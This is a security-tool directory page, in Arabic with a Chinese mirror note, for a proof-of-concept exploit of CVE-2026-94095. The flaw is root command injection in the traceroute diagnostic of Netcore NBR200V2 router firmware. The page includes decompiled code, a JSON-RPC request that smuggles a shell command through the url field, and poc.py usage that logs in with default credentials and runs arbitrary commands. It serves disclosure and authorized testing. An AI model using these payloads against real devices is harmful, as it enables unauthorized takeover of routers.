Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-94095 — PoC لـ CVE-2026-94095، وهو حقن أوامر traceroute في برنامج Netcore NBR200V2 الثابت عبر ubus JSON-RPC، مما يتيح تنفيذ أوامر عن بُعد بصلاحيات الجذر للاختبار المصرّح به. | Kitploit
أدوات/GitHubGitHub/hackspeak/cve-2026-94095
أمان الأنظمة المدمجةأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمان الأجهزة وإنترنت الأشياءالأوراق والأبحاث
GitHubhackspeak/cve-2026-94095

CVE-2026-94095

PoC لـ CVE-2026-94095، وهو حقن أوامر traceroute في برنامج Netcore NBR200V2 الثابت عبر ubus JSON-RPC، مما يتيح تنفيذ أوامر عن بُعد بصلاحيات الجذر للاختبار المصرّح به.

1منذ 7س 31دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

Netcore NBR200V2 - حقن أوامر عن بُعد في ميزة تشخيص Traceroute (CVE-2026-94095)

الحقلالقيمة
المورّدNetcore
الطرازNBR200V2
إصدار البرنامج الثابتV1.3.241127.071246
المكوّن المتأثر/usr/bin/network_tools
نوع الثغرةحقن أوامر نظام التشغيل (CWE-74 / CWE-77)
CVSS 3.19.9 (حرجة)
ناقل الهجومعن بُعد (ubus JSON-RPC)
المتطلب المسبقنقطة نهاية ubus قابلة للوصول + جلسة منخفضة الصلاحيات (sid)
حالة المورّدتم التواصل مبكرًا؛ لا استجابة؛ لا تصحيح وقت الإفصاح

الوصف

يحتوي البرنامج الثابت Netcore NBR200V2 الإصدار V1.3.241127.071246 على ثغرة حقن أوامر عن بُعد في ميزة تشخيص traceroute. يقبل معالج traceroute قيمة url يتحكم بها المهاجم من ubus JSON-RPC، ويدمجها في أمر shell، ثم ينفّذ الأمر الناتج. يمكن للمهاجم عن بُعد استغلال هذا الخلل لتنفيذ أوامر shell عشوائية، أو إعادة تشغيل الجهاز، أو تحقيق اختراق كامل للنظام.

سلسلة الثغرة

يُقبل الطلب عن بُعد كـ ubus JSON-RPC:

root@kitploit:~
POST /ubus {"jsonrpc":"2.0","id":20,"method":"call","params":["<sid>","network_tools","tools_traceroute",{"action":"start","url":"<attacker-controlled>","max_hop":1,"wanid":0}]}

يوجّه تعيين طريقة ubus الطلب إلى sub_401BD8:

root@kitploit:~
object.name = "network_tools"; object.methods = 0x412f4c; "tools_traceroute" -> sub_401BD8

يحلّل sub_401BD8 بيانات JSON-RPC ويمرّرها إلى tools_traceroute():

root@kitploit:~
blobmsg_parse(&off_412FA4, 4, &v21, a5 + 4, (v6 & 0xFFFFFF) - 4);
...
v25[0] = v18;              // action
v25[1] = v7;               // url
v25[2] = _bswapsi2(*v8);   // max_hop
...
result = tools_traceroute((int)v25);

يبني tools_traceroute() أمر shell باستخدام قيمة url غير الموثوقة:

root@kitploit:~
snprintf(
    v4, 0x100u,
    "(traceroute %s -m %d > %s && echo \"traceroute ending\" >> %s; touch %s)&",
    v2, *(_DWORD *)(a1 + 8), "/tmp/traceroute.txt", "/tmp/traceroute.txt", "/tmp/.tracroute_end");
system(v4);

الثغرة متطابقة بنيويًا مع مشكلة ping، لكنها تصل إلى نقطة تنفيذ ومسار تنفيذ مختلفين. ولأنه يُستخدم system()، فإن فواصل الأوامر مثل ; و && وتعليقات shell تُحترم. وبذلك تتحول ميزة التشخيص إلى أداة تنفيذ أوامر عامة الأغراض.

إثبات المفهوم

root@kitploit:~
POST /ubus
Content-Type: application/json

{"jsonrpc":"2.0","id":20,"method":"call","params":["<sid>","network_tools","tools_traceroute",{"action":"start","url":"127.0.0.1;reboot;#","max_hop":1}]}

التأثير المتوقع: ينفّذ الراوتر reboot أثناء معالجة مهمة traceroute. يمكن استبدال reboot بأوامر shell عشوائية.

الثغرات ذات الصلة (نفس الدفعة)

  • CVE-2026-94096 — مسار إعداد IP للشبكة المحلية (نفس الملف التنفيذي، نفس النمط).
  • CVE-2026-94097 — نقطة نهاية تشخيص CGI (CVSS 10.0).

جميع الثغرات الثلاث تصل إلى نفس /usr/bin/network_tools؛ وتتشارك دوال التشخيص في هذا الملف التنفيذي نفس النمط غير الآمن، لذا فإن إصلاح نقطة دخول واحدة لا يكفي.

المعالجة

لا يوجد تصحيح من المورّد وقت الإفصاح. تدابير التخفيف المؤقتة:

  1. لا تعرّض واجهة الإدارة لشبكات غير موثوقة؛ أزل جميع تعيينات الإدارة من جهة WAN؛
  2. غيّر بيانات الاعتماد الافتراضية وفرض كلمات مرور قوية ومتجددة (مصادقة ubus هي المتطلب المسبق لهذا الهجوم)؛
  3. قيّد نقطة نهاية ubus / الإدارة على شبكة فرعية مخصصة للعمليات عبر جدار الحماية؛
  4. تابع تحديثات البرنامج الثابت من المورّد وتحقق من الإصلاحات الخاصة بـ CVE-2026-94095/94096/94097 معًا.

الفضل

الإفصاح من قبل الباحث المستقل الذي نشر التحليل التقني ونسّق (دون نجاح) مع المورّد.


分发镜像说明(中文)

本仓库为 CVE-2026-94095(Netcore NBR200V2 traceroute 命令注入) 漏洞 PoC 的中转分发镜像(英文技术披露见上方 CVE-2026-94095.md)。内容依据公开披露文档整理,仅作存档与分发用途。PoC 仅供安全研究、漏洞验证与授权测试,请勿用于未授权目标。

漏洞简述 / Vulnerability Summary

  • CVE-2026-94095(同批:CVE-2026-94096 / CVE-2026-94097)
  • 影响产品:Netcore NBR200V2 企业路由器,固件 V1.3.241127.071246
  • 受影响组件:/usr/bin/network_tools(traceroute 诊断功能)
  • 类型:OS 命令注入(CWE-74 / CWE-77)
  • CVSS 3.1:9.9(Critical);CVSS 4.0:8.6;CVSS 2.0:9.0
  • 攻击面:ubus JSON-RPC 端点(POST /ubus)
  • 前置条件:可访问 ubus 接口 + 一个低权限会话(sid);弱口令/默认口令会显著降低门槛
  • 修复状态:披露者提前联系厂商,厂商零回应,暂无官方补丁

核心原理:tools_traceroute() 用 snprintf 把攻击者可控的 url 参数拼进 shell 命令,再交给 system() 执行;url 未做任何过滤/转义,分号 ;、&&、管道、注释符 # 均有效——诊断功能因此变成通用命令执行原语。

目录结构 / Layout

root@kitploit:~
CVE-2026-94095.md   —— 公开披露整理(调用链、反编译片段、PoC 请求)
poc.py              —— 可用 PoC 脚本(ubus JSON-RPC 注入,纯标准库)

环境与用法 / Requirements & Usage

  • 目标:未修复的 Netcore NBR200V2(实验室设备);需可访问 POST /ubus 与一个有效 sid
  • 依赖:Python 3(纯标准库,零第三方依赖)
root@kitploit:~
# 已有 sid:
python3 poc.py --target http://192.168.1.1 --sid <SESSION_ID> --cmd "id"

# 用账号口令获取 sid(弱口令/默认口令场景):
python3 poc.py --target http://192.168.1.1 --user admin --password admin --cmd "reboot"

⚠️ 命令会被拼接为 127.0.0.1;<命令>;# 注入 url 参数;reboot 会直接重启设备,请仅在授权/可销毁环境测试。

免责声明 / Disclaimer

本 PoC 仅供教学、安全研究与授权测试使用,仅可对自有或获得明确授权的设备运行。利用会以设备最高权限执行任意命令(默认运行于 root 上下文),请在可销毁的实验室环境中测试。

归属与许可 / Attribution & License

  • 漏洞由独立研究者公开披露并整理利用链;本仓库为其公开材料的镜像与 PoC 实现。
  • 分发仓库采用 MIT License(见 LICENSE)。

参考链接 / References

  • NVD:https://nvd.nist.gov/vuln/detail/CVE-2026-94095
  • CVE 记录:https://www.cve.org/CVERecord?id=CVE-2026-94095
  • 第三方分析(VulDB):https://vuldb.com/vuln/408024
تنزيل الأداة